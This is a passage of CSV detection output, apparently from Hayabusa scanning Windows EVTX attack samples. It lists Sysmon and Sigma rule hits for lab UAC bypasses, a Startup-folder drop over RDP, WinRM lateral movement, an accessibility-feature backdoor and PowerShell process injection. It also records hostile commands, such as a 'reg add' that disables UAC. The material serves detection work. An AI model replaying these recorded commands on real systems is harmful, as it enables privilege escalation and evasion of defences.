C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.487 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.487 +00:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.814 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.831 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.831 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.831 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 14:03:45.100 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:05.697 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:05.697 +00:00,alice.insecurebank.local,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:05.697 +00:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/file_event_win_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:06.339 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 14:04:28.860 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 17:17:26.440 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:26.440 +00:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:26.738 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:26.738 +00:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:17:38.250 +00:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-14 17:31:27.973 +00:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx +2019-05-14 17:42:52.833 +00:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-14 17:42:52.848 +00:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-14 17:42:53.854 +00:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-14 17:43:03.888 +00:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 04:18:40.474 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-15 04:18:40.474 +00:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,rules/sigma/registry_sysmon/registry_set/registry_set_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 01:31:36.426 +00:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 01:31:36.454 +00:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 01:31:36.456 +00:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 01:38:19.630 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 01:38:19.630 +00:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 01:38:19.630 +00:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation_sysmon/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 13:10:13.760 +00:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx +2019-05-16 14:17:15.762 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 14:17:15.763 +00:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 14:17:15.763 +00:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 14:17:15.763 +00:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,rules/sigma/registry_sysmon/registry_set/registry_set_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 16:08:30.516 +00:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:34.867 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-16 16:08:40.360 +00:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-18 17:16:08.348 +00:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:08.348 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.176 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.208 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 